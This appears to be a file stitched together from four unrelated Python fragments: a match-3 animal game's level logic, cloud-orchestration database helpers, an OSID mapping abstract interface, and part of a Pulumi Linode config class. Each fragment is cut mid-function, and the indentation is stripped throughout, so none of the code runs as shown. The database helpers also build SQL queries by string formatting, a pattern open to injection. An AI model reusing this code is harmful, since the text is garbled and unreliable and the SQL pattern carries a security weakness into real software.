self.animal[row][col+4] = self.animal[row+4][col] = self.animal[row+4][col+8] = self.animal[row+8][col+4] = -1
for i in range(row+1, row+8):
for j in range(col+1, col+8):
self.ice_list[i][j] = 1
self.init_step = 35
else:
self.__init__(9, 9)
row, col = self.row, self.col
for i in range(row, row+2):
for j in range(col, col+9):
self.animal[i][j] = -1
self.animal[row][col+4] = randint(0, 5)
self.animal[row+1][col+2] = randint(0, 5)
self.animal[row+1][col+4] = randint(0, 5)
self.animal[row+1][col+6] = randint(0, 5)
self.animal[row+2][col+1] = self.animal[row+3][col+1] = self.animal[row+2][col+3] = self.animal[row+3][col+3] =\
self.animal[row+2][col+5] = self.animal[row+3][col+5] = self.animal[row+2][col+7] = \
self.animal[row+3][col+7] = self.animal[row+8][col] = self.animal[row+8][col+8] = -1
for i in range(row+4, row+8):
for j in range(col, col+9):
self.ice_list[i][j] = 1
self.ice_list[row+2][col+4] = self.ice_list[row+3][col+2] = self.ice_list[row+3][col+4] = \
self.ice_list[row+3][col+6] = 1
self.init_step = 40
self.type = 0
self.energy_num -= 5
self.success_board = Board(Board.success, [200, 0]) # Success board
self.fail_board = Board(Board.fail, [200, 0]) # Failure board
self.step = self.init_step
self.score = 0
self.animal_num = [0, 0, 0, 0, 0, 0]
self.ice_num = 0
self.reset_mode = False
def num_add(self):
'''Add to score'''
if self.num_sign:
self.money += self.score * 2
if self.score < self.min:
self.energy_num += 1
elif self.score < self.max:
self.energy_num += 2
else:
self.energy_num += 5
self.num_sign = False
def judge_level(self):
'''Check whether the level was passed'''
if self.step <= 0:
self.type = -1 # Game over
if self.level == 1:
if self.animal_num[4] >= 10: # L1: 10 frogs
self.type = 1 # Level 1 passed
self.num_add()
elif self.level == 2:
if self.animal_num[1] >= 21: # L2: 21 bears
self.type = 1 # Level 2 passed
self.num_add()
elif self.level == 3:
if self.animal_num[4] >= 16 and self.animal_num[5] >= 16: # L3: 16 frogs and 16 cows
self.type = 1 # Level 3 passed
self.num_add()
elif self.level == 4:
if self.animal_num[5] >= 18 and self.animal_num[2] >= 18: # L4: 18 cows and 18 chicks
self.type = 1 # Level 4 passed
self.num_add()
elif self.level == 5:
if self.animal_num[2] >= 28 and self.animal_num[0] >= 28: # L5: 28 chicks and 28 foxes
self.type = 1 # Level 5 passed
self.num_add()
elif self.level == 6:
if self.animal_num[4] >= 70: # L6: 70 frogs
self.type = 1 # Level 6 passed
self.num_add()
elif self.level == 7:
if self.animal_num[2] >= 36 and self.animal_num[1] >= 36 and self.animal_num[0] >= 36: # L7: 36 chickens, 36 bears and 36 foxes
self.type = 1 # Level 7 passed
self.num_add()
elif self.level == 8:
if self.ice_num >= 15: # L8: 15 ice
self.type = 1 # Level 8 passed
self.num_add()
elif self.level == 9:
if self.ice_num >= 49: # L9: 49 ice
self.type = 1 # | |
if not db_row:
return
if db_row["entitytype"] == "server":
create_or_update_server_details(db, dbid, rest, slice_dbid)
elif db_row["entitytype"] == "serverfarm":
create_or_update_serverfarm_details(db, dbid, rest)
elif db_row["entitytype"] == "compute_network_service":
create_or_update_compute_details(db, dbid, rest)
elif db_row["entitysubtype"] == "network_service":
create_or_update_service_details(db, dbid, rest, slice_dbid)
elif db_row["entitytype"] == "container":
create_or_update_container_details(db, dbid, rest, slice_dbid)
elif db_row["entitytype"] == "volume":
create_or_update_volume_details(db, dbid, rest, slice_dbid)
def create_or_update_uri(db, db_row, dbid, slice_uri, rest, slice_dbid=0, uri_type="home", vdc_row=None):
try:
if "uri" in rest and rest["uri"]:
update = {"tblEntities": dbid, "tblSlices": slice_dbid, "type": uri_type}
if not db_row or db_row["entitytype"] not in entity_constants.physical_entitytypes:
update["uri"] = slice_uri + rest["uri"]
if uri_type == "home":
if "novnc_url" in rest:
rest["novnc_url"] = cloud_utils.update_user_url(rest["novnc_url"], slice_uri)
update["rest_response"] = json.dumps(rest)
create_or_update_entity_details(db, db_row, dbid, rest, slice_dbid=slice_dbid)
if "statistics" in rest:
update["statistics"] = slice_uri + rest["statistics"]
if "traffic_stats" in rest:
update["statistics"] = slice_uri + rest["traffic_stats"]
cloud_utils.update_or_insert(db, "tblUris", update,
{"tblEntities": dbid, "tblSlices": slice_dbid, "type": uri_type})
if "firewall" in rest and isinstance(rest["firewall"], list) and vdc_row:
for cfd_group in rest["firewall"]:
group_row = cloud_utils.lower_key(db.get_row_dict("tblEntities", {"parententityid": vdc_row["id"],
"entitytype": "security_group",
"deleted": 0,
"name": cfd_group[
"security_group"]
}, order="ORDER BY id LIMIT 1"))
if not group_row:
continue
if "status" in cfd_group and isinstance(cfd_group["status"], list):
for cfd_child in cfd_group["status"]:
child_row = cloud_utils.lower_key(
db.get_row_dict("tblEntities", {"parententityid": group_row["id"],
"entitytype": "security_rule",
"deleted": 0,
"name": cfd_child["name"]
}, order="ORDER BY id LIMIT 1"))
if not child_row:
continue
cloud_utils.update_or_insert(db, "tblAttachedEntitiesStatus",
{"vdcentityid": vdc_row["id"],
"childentityid": child_row["id"],
"groupentityid": group_row["id"],
"serviceentityid": db_row["parententityid"],
"portentityid": dbid,
"entitystatus": cfd_child["entity_state"],
"details": cfd_child.pop("details", "")
},
{"vdcentityid": vdc_row["id"],
"childentityid": child_row["id"],
"groupentityid": group_row["id"],
"serviceentityid": db_row["parententityid"],
"portentityid": dbid,
})
if "vpn" in rest and isinstance(rest["vpn"], list) and vdc_row:
for cfd_group in rest["vpn"]:
group_row = cloud_utils.lower_key(db.get_row_dict("tblEntities", {"parententityid": vdc_row["id"],
"entitytype": "vpn_group",
"deleted": 0,
"name": cfd_group["vpn_group"]
}, order="ORDER BY id LIMIT 1"))
if not group_row:
continue
if "status" in cfd_group and isinstance(cfd_group["status"], list):
for cfd_child in cfd_group["status"]:
child_row = cloud_utils.lower_key(
db.get_row_dict("tblEntities", {"parententityid": group_row["id"],
"entitytype": "vpn_connection",
"deleted": 0,
"name": cfd_child["name"]
}, order="ORDER BY id LIMIT 1"))
if not child_row:
continue
cloud_utils.update_or_insert(db, "tblAttachedEntitiesStatus",
{"vdcentityid": vdc_row["id"],
"childentityid": child_row["id"],
"groupentityid": group_row["id"],
"serviceentityid": db_row["parententityid"],
"portentityid": dbid,
"entitystatus": cfd_child["entity_state"],
"details": cfd_child.pop("details", "")
},
{"vdcentityid": vdc_row["id"],
"childentityid": child_row["id"],
"groupentityid": group_row["id"],
"serviceentityid": db_row["parententityid"],
"portentityid": dbid,
})
if "load_balancer" in rest and isinstance(rest["load_balancer"], list) and vdc_row:
for cfd_group in rest["load_balancer"]:
group_row = cloud_utils.lower_key(db.get_row_dict("tblEntities", {"parententityid": vdc_row["id"],
"entitytype": "lbs_group",
"deleted": 0,
"name": cfd_group["lbs_group"]
}, order="ORDER BY id LIMIT 1"))
if not group_row:
continue
if "status" in cfd_group and isinstance(cfd_group["status"], list):
for cfd_child in cfd_group["status"]:
child_row = cloud_utils.lower_key(
db.get_row_dict("tblEntities", {"parententityid": group_row["id"],
"entitytype": "lbs_service",
"deleted": 0,
"name": cfd_child["name"]
}, order="ORDER BY id LIMIT 1"))
if not child_row:
continue
cloud_utils.update_or_insert(db, "tblAttachedEntitiesStatus",
{"vdcentityid": vdc_row["id"],
"childentityid": child_row["id"],
"groupentityid": group_row["id"],
"serviceentityid": db_row["parententityid"],
"portentityid": dbid,
"entitystatus": cfd_child["entity_state"],
"details": cfd_child.pop("details", "")
},
{"vdcentityid": vdc_row["id"],
"childentityid": child_row["id"],
"groupentityid": group_row["id"],
"serviceentityid": db_row["parententityid"],
"portentityid": dbid,
})
if "acl" in rest and isinstance(rest["acl"], list) and vdc_row:
for cfd_group in rest["acl"]:
group_row = cloud_utils.lower_key(db.get_row_dict("tblEntities", {"parententityid": vdc_row["id"],
"entitytype": "acl_group",
"deleted": 0,
"name": cfd_group["access_group"]
}, order="ORDER BY id LIMIT 1"))
if not group_row:
continue
if "status" in cfd_group and isinstance(cfd_group["status"], list):
for cfd_child in cfd_group["status"]:
child_row = cloud_utils.lower_key(
db.get_row_dict("tblEntities", {"parententityid": group_row["id"],
"entitytype": "acl_rule",
"deleted": 0,
"name": cfd_child["name"]
}, order="ORDER BY id LIMIT 1"))
if not child_row:
continue
cloud_utils.update_or_insert(db, "tblAttachedEntitiesStatus",
{"vdcentityid": vdc_row["id"],
"childentityid": child_row["id"],
"groupentityid": group_row["id"],
"serviceentityid": db_row["parententityid"],
"portentityid": dbid,
"entitystatus": cfd_child["entity_state"],
"details": cfd_child.pop("details", "")
},
{"vdcentityid": vdc_row["id"],
"childentityid": child_row["id"],
"groupentityid": group_row["id"],
"serviceentityid": db_row["parententityid"],
"portentityid": dbid,
})
else:
LOG.warn(_("URI missing in rest: %s for dbid: %s for uri_type: %s" % (rest, dbid, uri_type)))
except:
cloud_utils.log_exception(sys.exc_info())
def update_only_uri(db, db_row, dbid, rest, entity_url, uri_type="home"):
try:
if "uri" in rest and rest["uri"]:
update = {"tblEntities": dbid, "type": uri_type}
if uri_type == "home":
if "novnc_url" in rest:
rest["novnc_url"] = cloud_utils.update_user_url(rest["novnc_url"], entity_url)
update["rest_response"] = json.dumps(rest)
cloud_utils.update_only(db, "tblUris", update, {"tblEntities": dbid, "type": uri_type})
else:
LOG.warn(_("URI missing in rest: %s for dbid: %s for uri_type: %s" % (rest, dbid, uri_type)))
except:
cloud_utils.log_exception(sys.exc_info())
def get_next_service(db, dbid):
try:
for entitytype in entity_constants.topology_network_services:
if entitytype in entity_manager.entities:
for service in cloud_utils.entity_children(db, dbid, entitytype,
entity_manager.entities[entitytype].child_table):
yield service
except GeneratorExit:
LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
except:
cloud_utils.log_exception(sys.exc_info())
def get_next_vdc_service(db, dbid):
try:
current_index = 0
while True:
service = db.get_row("tblEntities",
"parententityid = '%s' AND entitysubtype='network_service' AND id > '%s'" % (
dbid, current_index),
order="ORDER BY id LIMIT 1")
if service:
current_index = service['id']
yield cloud_utils.lower_key(service)
else:
break
yield service
except GeneratorExit:
LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
except:
cloud_utils.log_exception(sys.exc_info())
def get_next_vdc_interface(db, dbid):
try:
for interface in cloud_utils.entity_members(db, dbid, "network_interface", child_table=entity_manager.entities[
"network_interface"].child_table):
yield interface
except GeneratorExit:
LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
except:
cloud_utils.log_exception(sys.exc_info())
def get_next_service_port(db, dbid):
try:
for interface in cloud_utils.entity_members(db, dbid, "service_port",
child_table=entity_manager.entities["service_port"].child_table):
yield interface
except GeneratorExit:
LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
except:
cloud_utils.log_exception(sys.exc_info())
def get_next_vdc_group(db, dbid):
try:
for profile in entity_constants.profile_groups_provision_order:
if profile["group"] in entity_manager.entities:
for group in cloud_utils.entity_members(db, dbid, profile["group"], child_table=entity_manager.entities[
profile["group"]].child_table):
yield group
except GeneratorExit:
LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
except:
cloud_utils.log_exception(sys.exc_info())
def get_next_group(db, dbid, group=entity_constants.profile_groups_provision_order):
try:
for profile in group:
if profile["group"] in entity_manager.entities:
for group in cloud_utils.entity_members(db, dbid, profile["group"], child_table=entity_manager.entities[
profile["group"]].child_table):
yield group
if profile["child"] and profile["child"] in entity_manager.entities:
for child in cloud_utils.entity_members(db, group["id"], profile["child"],
child_table=entity_manager.entities[
profile["child"]].child_table):
yield child
except GeneratorExit:
LOG.info(_("Ignoring Generator Error for dbid: %s" % dbid))
except:
cloud_utils.log_exception(sys.exc_info())
def get_entity_row_dict(db, where):
try:
primary_row = db.get_row_dict("tblEntities", where, order="ORDER BY id LIMIT 1")
if not primary_row:
return None
crow = db.get_row(entity_manager.entities[primary_row["EntityType"]].child_table,
"tblEntities='%s' " % primary_row['id'], order="ORDER BY id LIMIT 1")
if "id" in crow:
crow["child_id"] = crow.pop("id")
primary_row.update(crow)
return cloud_utils.lower_key(primary_row)
except:
cloud_utils.log_exception(sys.exc_info())
def get_next_entity_row(db, where):
try:
current_index = 0
while True:
w = " %s AND id > %s " % (where, current_index)
primary_row = db.get_row("tblEntities", w, order="ORDER BY id LIMIT 1")
if not primary_row:
return
current_index = primary_row["id"]
child_table = entity_manager.entities[primary_row["EntityType"]].child_table
if child_table:
crow = db.get_row(child_table,
"tblEntities='%s' " % primary_row['id'], order="ORDER BY id LIMIT 1")
if "id" in crow:
crow["child_id"] = crow.pop("id")
primary_row.update(crow)
yield cloud_utils.lower_key(primary_row)
except GeneratorExit:
LOG.info(_("Ignoring Generator Error for where: %s" % where))
except:
cloud_utils.log_exception(sys.exc_info())
def get_next_entity_attached(db, dbid):
try:
current_index = 0
while True:
row = cloud_utils.lower_key(
db.get_row("tblAttachedEntities", "tblEntities = '%s' AND id > '%s'" % (dbid, current_index),
order="ORDER BY id LIMIT 1"))
if row:
current_index = row['id']
yield row
else:
break
except GeneratorExit:
LOG.info(_("Ignoring Generator Error"))
except:
cloud_utils.log_exception(sys.exc_info())
def get_next_attached_parent_entity(db, dbid, entitytype=None):
for row in get_next_attached_parent(db, dbid, entitytype):
yield cloud_utils.lower_key(
db.get_row_dict("tblEntities", {"id": row["tblentities"]}, order="ORDER BY id LIMIT 1"))
def get_next_attached_parent(db, dbid, entitytype=None):
try:
current_index = 0
if entitytype:
cond = "AND entitytype = '%s' " % entitytype
else:
cond = ""
while True:
row = cloud_utils.lower_key(
db.get_row("tblAttachedEntities",
"AttachedEntityId = '%s' AND id > %s %s " % (dbid, current_index, cond),
order="ORDER BY id LIMIT 1"))
if row:
current_index = row['id']
yield row
else:
break
except GeneratorExit:
LOG.info(_("Ignoring Generator Error"))
except:
cloud_utils.log_exception(sys.exc_info())
def set_entity_mode(db, dbid, mode):
db.execute_db("UPDATE tblEntities SET EntityMode = '%s', updated_at=now() "
"WHERE (id='%s' AND deleted=0)" % (mode, dbid))
def reset_status_and_uri(db, dbid, status):
db.execute_db("UPDATE tblEntities SET EntityStatus = '%s', EntityMode = '%s', updated_at=now(), EntityBridgeId=0 "
"WHERE (id='%s' AND deleted=0)" % (status, status, dbid))
db.execute_db("UPDATE tblUris SET deleted = 1, deleted_at=now() "
"WHERE (tblEntities='%s' AND deleted=0)" % dbid)
db.execute_db("UPDATE tblEntityDetails SET deleted = 1, deleted_at=now() "
"WHERE (tblEntities='%s' AND deleted=0)" % dbid)
def reset_vdc_entities(db, dbid):
try:
entity = cloud_utils.lower_key(
db.get_row_dict("tblEntities", {"id": dbid}, order="ORDER BY id LIMIT 1"))
reset_compute_resources(db, entity)
reset_network_resources(db, entity)
# db.update_db(
# "UPDATE tblResourcesCompute SET cpu=0,ram=0,network=0 WHERE Catagory='deployed' AND tblEntities='%s'" % dbid)
for profile in get_next_group(db, dbid, group=entity_constants.profile_groups_deprovision_order):
reset_status_and_uri(db, profile["id"], "Ready")
if profile["entitytype"] == "server":
db.execute_db("UPDATE tblServers SET novnc_url=NULL WHERE (id ='%s')" % profile["child_id"])
db.execute_db(
"DELETE FROM tblAttachedEntities WHERE attachedentityid='%s' AND AttachedEntityType='physical' " %
profile["id"])
if profile["entitytype"] == "volume":
db.execute_db(
"DELETE FROM tblAttachedEntities WHERE attachedentityid='%s' AND AttachedEntityType='physical' " %
profile["id"])
for service in get_next_service(db, dbid):
reset_status_and_uri(db, service["id"], "Ready")
db.execute_db(
"DELETE FROM tblAttachedEntities WHERE attachedentityid='%s' AND AttachedEntityType='physical' " %
service["id"])
db.execute_db("UPDATE tblEntities SET EntityStatus = 'Ready', EntityMode = 'Ready', updated_at=now() "
"WHERE (EntityType = 'network_interface' AND ParentEntityId='%s' "
"AND deleted=0)" % dbid)
db.execute_db("UPDATE tblEntities SET EntityStatus = 'Ready', EntityMode = 'Ready', updated_at=now() "
"WHERE (id='%s' "
"AND deleted=0)" % dbid)
db.execute_db("DELETE FROM tblAttachedEntitiesStatus WHERE (vdcentityid='%s')" % dbid)
except:
cloud_utils.log_exception(sys.exc_info())
def json_default(o):
if type(o) is datetime.date or type(o) is datetime.datetime:
return o.isoformat()
class DashBoard(object):
def | |
to complete request
:raise: ``Unimplemented`` -- ``supports_location_admin()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_admin()`` and
``supports_visible_federation()`` are ``true``*
"""
return # osid.mapping.LocationAdminSession
@abc.abstractmethod
def get_location_notification_session(self, location_receiver):
"""Gets the ``OsidSession`` associated with the location notification service.
:param location_receiver: the notification callback
:type location_receiver: ``osid.mapping.LocationReceiver``
:return: a ``LocationNotificationSession``
:rtype: ``osid.mapping.LocationNotificationSession``
:raise: ``NullArgument`` -- ``location_receiver`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_notification()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_notification()`` is ``true``.*
"""
return # osid.mapping.LocationNotificationSession
@abc.abstractmethod
def get_location_notification_session_for_map(self, location_receiver, map_id):
"""Gets the ``OsidSession`` associated with the location notification service for the given map.
:param location_receiver: the notification callback
:type location_receiver: ``osid.mapping.LocationReceiver``
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``LocationNotificationSession``
:rtype: ``osid.mapping.LocationNotificationSession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``location_receiver`` or ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_notification()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_notification()`` and
``supports_visible_federation()`` are ``true``*
"""
return # osid.mapping.LocationNotificationSession
@abc.abstractmethod
def get_location_hierarchy_session(self):
"""Gets the ``OsidSession`` associated with the location hierarchy service.
:return: a ``LocationHierarchySession``
:rtype: ``osid.mapping.LocationHierarchySession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_hierarchy()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_hierarchy()`` is ``true``.*
"""
return # osid.mapping.LocationHierarchySession
location_hierarchy_session = abc.abstractproperty(fget=get_location_hierarchy_session)
@abc.abstractmethod
def get_location_hierarchy_session_for_map(self, map_id):
"""Gets the ``OsidSession`` associated with the location hierarchy service for the given map.
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``LocationHierarchySession``
:rtype: ``osid.mapping.LocationHierarchySession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_hierarchy()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_hierarchy()`` and
``supports_visible_federation()`` are ``true``*
"""
return # osid.mapping.LocationHierarchySession
@abc.abstractmethod
def get_location_hierarchy_design_session(self):
"""Gets the ``OsidSession`` associated with the location hierarchy design service.
:return: a ``LocationHierarchyDesignSession``
:rtype: ``osid.mapping.LocationHierarchyDesignSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_hierarchy_design()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_hierarchy_design()`` is ``true``.*
"""
return # osid.mapping.LocationHierarchyDesignSession
location_hierarchy_design_session = abc.abstractproperty(fget=get_location_hierarchy_design_session)
@abc.abstractmethod
def get_location_hierarchy_design_session_for_map(self, map_id):
"""Gets the ``OsidSession`` associated with the location hierarchy design service for the given map.
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``LocationHierarchySession``
:rtype: ``osid.mapping.LocationHierarchyDesignSession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_hierarchy_design()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_hierarchy_design()`` and
``supports_visible_federation()`` are ``true``*
"""
return # osid.mapping.LocationHierarchyDesignSession
@abc.abstractmethod
def get_location_map_session(self):
"""Gets the ``OsidSession`` to lookup location/map mappings.
:return: a ``LocationMapSession``
:rtype: ``osid.mapping.LocationMapSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_map()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_map()`` is ``true``.*
"""
return # osid.mapping.LocationMapSession
location_map_session = abc.abstractproperty(fget=get_location_map_session)
@abc.abstractmethod
def get_location_map_assignment_session(self):
"""Gets the ``OsidSession`` associated with assigning locations to maps.
:return: a ``LocationMapAssignmentSession``
:rtype: ``osid.mapping.LocationMapAssignmentSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_map_assignment()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_map_assignment()`` is ``true``.*
"""
return # osid.mapping.LocationMapAssignmentSession
location_map_assignment_session = abc.abstractproperty(fget=get_location_map_assignment_session)
@abc.abstractmethod
def get_location_smart_map_session(self, map_id):
"""Gets the ``OsidSession`` to manage locatin smart maps.
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``LocationSmartMapSession``
:rtype: ``osid.mapping.LocationSmartMapSession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_smart_map()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_smart_map()`` is ``true``.*
"""
return # osid.mapping.LocationSmartMapSession
@abc.abstractmethod
def get_location_adjacency_session(self):
"""Gets the ``OsidSession`` associated with the location adjacency service.
:return: a ``LocationAdjacencySession``
:rtype: ``osid.mapping.LocationAdjacencySession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_adjacency()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_adjacency()`` is ``true``.*
"""
return # osid.mapping.LocationAdjacencySession
location_adjacency_session = abc.abstractproperty(fget=get_location_adjacency_session)
@abc.abstractmethod
def get_location_adjacency_session_for_map(self, map_id):
"""Gets the ``OsidSession`` associated with the location adjacency service for the given map.
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``LocationAdjacencySession``
:rtype: ``osid.mapping.LocationAdjacencySession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_adjacency()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_adjacency()`` and
``supports_visible_federation()`` are ``true``*
"""
return # osid.mapping.LocationAdjacencySession
@abc.abstractmethod
def get_location_spatial_session(self):
"""Gets the ``OsidSession`` associated with the location spatial service.
:return: a ``LocationSpatialSession``
:rtype: ``osid.mapping.LocationSpatialSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_spatial()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_spatial()`` is ``true``.*
"""
return # osid.mapping.LocationSpatialSession
location_spatial_session = abc.abstractproperty(fget=get_location_spatial_session)
@abc.abstractmethod
def get_location_spatial_session_for_map(self, map_id):
"""Gets the ``OsidSession`` associated with the location spatial service for the given map.
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``LocationSpatialSession``
:rtype: ``osid.mapping.LocationSpatialSession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_location_spatial()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_location_spatial()`` and
``supports_visible_federation()`` are ``true``*
"""
return # osid.mapping.LocationSpatialSession
@abc.abstractmethod
def get_resource_location_session(self):
"""Gets the ``OsidSession`` associated with the resource location service.
:return: a ``ResourceLocationSession``
:rtype: ``osid.mapping.ResourceLocationSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_resource_location()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_resource_location()`` is ``true``.*
"""
return # osid.mapping.ResourceLocationSession
resource_location_session = abc.abstractproperty(fget=get_resource_location_session)
@abc.abstractmethod
def get_resource_location_session_for_map(self, map_id):
"""Gets the ``OsidSession`` associated with the resource location service for the given map.
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``ResourceLocationSession``
:rtype: ``osid.mapping.ResourceLocationSession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_resource_location()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_resource_location()`` and
``supports_visible_federation()`` are ``true``*
"""
return # osid.mapping.ResourceLocationSession
@abc.abstractmethod
def get_resource_location_update_session(self):
"""Gets the ``OsidSession`` associated with the resource location update service.
:return: a ``ResourceLocationUpdateSession``
:rtype: ``osid.mapping.ResourceLocationUpdateSession``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_resource_location_update()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_resource_location_update()`` is ``true``.*
"""
return # osid.mapping.ResourceLocationUpdateSession
resource_location_update_session = abc.abstractproperty(fget=get_resource_location_update_session)
@abc.abstractmethod
def get_resource_location_update_session_for_map(self, map_id):
"""Gets the ``OsidSession`` associated with the resource location update service for the given map.
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``ResourceLocationUpdateSession``
:rtype: ``osid.mapping.ResourceLocationUpdateSession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_resource_location_update()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_resource_location_update()`` and
``supports_visible_federation()`` are ``true``*
"""
return # osid.mapping.ResourceLocationUpdateSession
@abc.abstractmethod
def get_resource_location_notification_session(self, resource_location_receiver):
"""Gets the ``OsidSession`` associated with the resource location notification service.
:param resource_location_receiver: the notification callback
:type resource_location_receiver: ``osid.mapping.ResourceLocationReceiver``
:return: a ``ResourceLocationNotificationSession``
:rtype: ``osid.mapping.ResourceLocationNotificationSession``
:raise: ``NullArgument`` -- ``resource_location_receiver`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_resource_location_notification()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_resource_location_notification()`` is ``true``.*
"""
return # osid.mapping.ResourceLocationNotificationSession
@abc.abstractmethod
def get_resource_location_notification_session_for_map(self, resource_location_receiver, map_id):
"""Gets the ``OsidSession`` associated with the resource location notification service for the given map.
:param resource_location_receiver: the notification callback
:type resource_location_receiver: ``osid.mapping.ResourceLocationReceiver``
:param map_id: the ``Id`` of the ``Map``
:type map_id: ``osid.id.Id``
:return: a ``ResourceLocationNotificationSession``
:rtype: ``osid.mapping.ResourceLocationNotificationSession``
:raise: ``NotFound`` -- no map found by the given ``Id``
:raise: ``NullArgument`` -- ``resource_location_receiver`` or ``map_id`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_resource_location_notification()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
| |
to this `device` slot.
"""
return pulumi.get(self, "volume_id")
@pulumi.output_type
class InstanceConfigHelpers(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "devtmpfsAutomount":
suggest = "devtmpfs_automount"
elif key == "modulesDep":
suggest = "modules_dep"
elif key == "updatedbDisabled":
suggest = "updatedb_disabled"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in InstanceConfigHelpers. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
InstanceConfigHelpers.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
InstanceConfigHelpers.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
devtmpfs_automount: Optional[bool] = None,
distro: Optional[bool] = None,
modules_dep: Optional[bool] = None,
network: Optional[bool] = None,
updatedb_disabled: Optional[bool] = None):
"""
:param bool distro: Controls the behavior of the Linode Config's Distribution Helper setting.
:param bool modules_dep: Creates a modules dependency file for the Kernel you run.
:param bool network: Controls the behavior of the Linode Config's Network Helper setting, used to automatically configure additional IP addresses assigned to this instance.
:param bool updatedb_disabled: Disables updatedb cron job to avoid disk thrashing.
"""
if devtmpfs_automount is not None:
pulumi.set(__self__, "devtmpfs_automount", devtmpfs_automount)
if distro is not None:
pulumi.set(__self__, "distro", distro)
if modules_dep is not None:
pulumi.set(__self__, "modules_dep", modules_dep)
if network is not None:
pulumi.set(__self__, "network", network)
if updatedb_disabled is not None:
pulumi.set(__self__, "updatedb_disabled", updatedb_disabled)
@property
@pulumi.getter(name="devtmpfsAutomount")
def devtmpfs_automount(self) -> Optional[bool]:
return pulumi.get(self, "devtmpfs_automount")
@property
@pulumi.getter
def distro(self) -> Optional[bool]:
"""
Controls the behavior of the Linode Config's Distribution Helper setting.
"""
return pulumi.get(self, "distro")
@property
@pulumi.getter(name="modulesDep")
